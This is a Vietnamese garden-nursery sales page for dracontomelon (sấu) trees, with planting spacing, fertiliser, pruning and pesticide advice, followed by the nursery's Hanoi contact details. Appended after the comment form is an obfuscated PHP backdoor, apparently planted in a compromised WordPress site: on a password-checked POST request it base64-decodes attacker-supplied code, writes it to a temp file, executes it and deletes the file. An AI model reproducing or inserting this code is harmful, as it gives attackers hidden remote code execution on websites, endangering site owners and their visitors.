Đặc điểm đặc trưng của cây sấu công trình

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cây Sấu Công Trình – Các bạn chắc đã quá quen thuộc với cây sấu, loại cây này vừa là cây tạo bóng mát và quả của cây này tạo được rất nhiều món ăn rất đặc trưng. Loại cây này có thể đạt được tuổi thọ rất lâu và thuộc vào họ Anacardiaceae. Hiện nay cây còn hỗ trợ tạo cảnh quan xanh cho nhiều công trình, cây đang được trồng nhiều cả trong các không gian sống hàng ngày. 

Vườn Cây Hòa Bình đem đến cho bạn đọc các thông tin đặc điểm đặc trưng của cây sấu công trình, để bạn có thể tham khảo. Bây giờ đã gần đến dịp tết Tân Sửu 2021 mong các quý khách có thể nhanh chóng chọn lựa ra những giống cây phù hợp cho các công trình hay không gian sân vườn nhà mình.

Hướng dẫn cách trồng cây sấu

Có thể nói cây sấu là một loại cây khá dễ trồng, loại cây này cũng không kén các loại đất trồng. Tuy nhiên nếu được sinh trưởng ở trong môi trường đất cát pha lẫn đất thịt với tầng đất dày khoảng dưới 1 mét và mực nước ngầm khoảng hơn 1 mét thì chính là điều kiện tốt nhất. Khi muốn cho cây trồng đạt được năng suất cao tốt thì cần trồng đảm bảo khoảng cách hàng là 7 mét và cây cách cây tầm khoảng 3 mét. 

Thông thường thì đến 5 năm đến 6 năm tuổi thì cây sẽ cho thu hoạch quả, trong thời gian đó cũng cần thực hiện việc cắt tỉa bớt các cành tăm để đem lại quả sấu năng suất và to hơn. 

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

 

Cần chuẩn bị hố trồng có độ sâu có kích thước khoảng 1 mét và cung cấp được lượng phân bón cho mỗi hố khoảng 30 kg phân chuồng hoai mục và thêm với 0,2 kg lân. Phần bầu cây đặt sao cho cổ rễ ở vị trí ngang với mặt đất sau đó dùng xẻng và dùng cuốc để nén chặt quanh gốc tầm 20cm và cần làm cẩn thận không sẽ bị vỡ mất phần bầu đất. 

Sau khi thực hiện việc trồng xong cần tưới đẫm để đảm bảo cung cấp đủ lượng nước cho cây. Cần duy trì đều đặn tưới nước cho cây vào 2 lần trong khoảng buổi sáng và buổi chiều tối. Đối với trường hợp trồng cây sấu nhằm lấy bóng mát, cần để ý tới chiêu cao khoảng 2 mét thì cần tiến hành bấm ngọn. Và mỗi một cây chỉ giữ 3 cành đến 4 cành chính lại, nhằm cho tán tỏa ra nhiều hướng để tạo thành một bộ khung vững chắc để giúp cây triển tốt nhất.

>>> Xem thêm: Dịch vụ mua, bán cây trồng giá rẻ tại Hà Nội

Hướng dẫn cách chăm sóc cây sấu

Khi trồng cây xong định kỳ hãy tưới nước để cung cấp đủ lượng nước tới cây sấu có thể chịu đựng qua màu khô, đến khi trái lớn và lúc mà quả sắp chín. Cũng cần phòng trừ cỏ dại bằng cách phủ gốc cây bằng phân xanh nhằm giúp hạn chế cho cỏ dại phát triển. Cần là cỏ ở các vụ xuân tầm tháng 1, tháng 2 hoặc là tháng 8, 9. Sao cho sạch được một lần trên một vụ, mỗi một năm xới gốc 2 lần đến 3 lần.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat
Hướng dẫn cách chăm sóc cây sấu

Cần thực hiện việc cắt tỉa thường xuyên cho cây, định kỳ cần phát cây bụi hay dây leo nhằm đảm bảo cây tránh được các dây leo thít nghẹt. Cũng tạo cho không gian thuận lợi nhất để cây có thể phát triển tốt nhất. Và cần phát dọn rồi tiến hành vun xới ở xung quanh gốc được đường kính 0,8 mét đến 1 mét cũng nhằm tạo cho phần đất xung quanh gốc thoáng khí và tơi xốp. Cần thực hiện việc vun xới đó khoảng 2 lần đến 3 lần mỗi năm.

>>> Xem thêm: Bán cây công trình giá rẻ – mua bán cây công trình giá rẻ Hà Nội

Hướng dẫn phòng ngừa sâu bệnh cho cây sấu

Cây sấu rất hay bị mắc các bệnh như rụng hoa, thối đen hoa, đen trên quả khi đó ta cần có biện pháp xử lý kịp thời. Đó chính là sử dụng Score 250 EC và Benlat C phun lúc hoa nở ở tháng thứ 2. Phun một lần trên một tuần rồi sau đó là một lần trên tháng. 

cây_sấu_công_trình
Hướng dẫn phòng ngừa sâu bệnh cho cây sấu

Tiếp theo là bệnh muội đen đây là một căn bệnh này cần đến Trebon 2,5EC hay Bassa 50EC để phun. 

Một bệnh nữa đó là bệnh cháy lá thường sẽ dễ mắc khi mùa mưa đến cần phun Kasumin 2 để tránh được luôn tình trạng sâu đục thân.

>>> Xem thêm: Thông tin chi tiết về Vườn cây Hòa Bình

Đơn vị cung cấp các loại cây sấu công trình chất lượng nhất

Vườn Cây Hòa Bình chính là một đơn vị uy tín, đơn vị chúng tôi chuyên cung cấp các loại cây công trình với nhiều các mẫu mã các cây khác nhau. Tại thời điểm hiện nay thì đang rất ưa chuộng trồng cây sấu tại những công trình phù hợp khác nhau. 

Đơn vị chúng tôi đã có kinh nghiệm kinh doanh các sản phẩm cây trồng rất lâu và luôn nhận được các nhận xét tốt từ những khách hàng. Vườn Cây Hòa Bình đã cung cấp đến với khách hàng đến với thị trường những cây xanh ngoại thất, cây phong thủy, cây xanh đô thị, cây xanh nội thất. Các bạn có thể chọn lựa thoải mái vì chúng tôi luôn đem đến các sản phẩm cây trồng đa dạng. Khi các bạn có nhu cầu trồng các loại cây trên xin vui lòng liên hệ tới các thông tin liên hệ sau để được những lời tư vấn tốt nhất.

CÂY CÔNG TRÌNH GIÁ RẺ TẠI HÀ NỘI

Hotline: 0962.376.560

Nguyễn Trường Giang

Bán hàng: 0962.376.560 

Địa chỉ: Tổ dân phố hoà bình 2, Biên giang , Hà Đông ,Hà Nội.

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}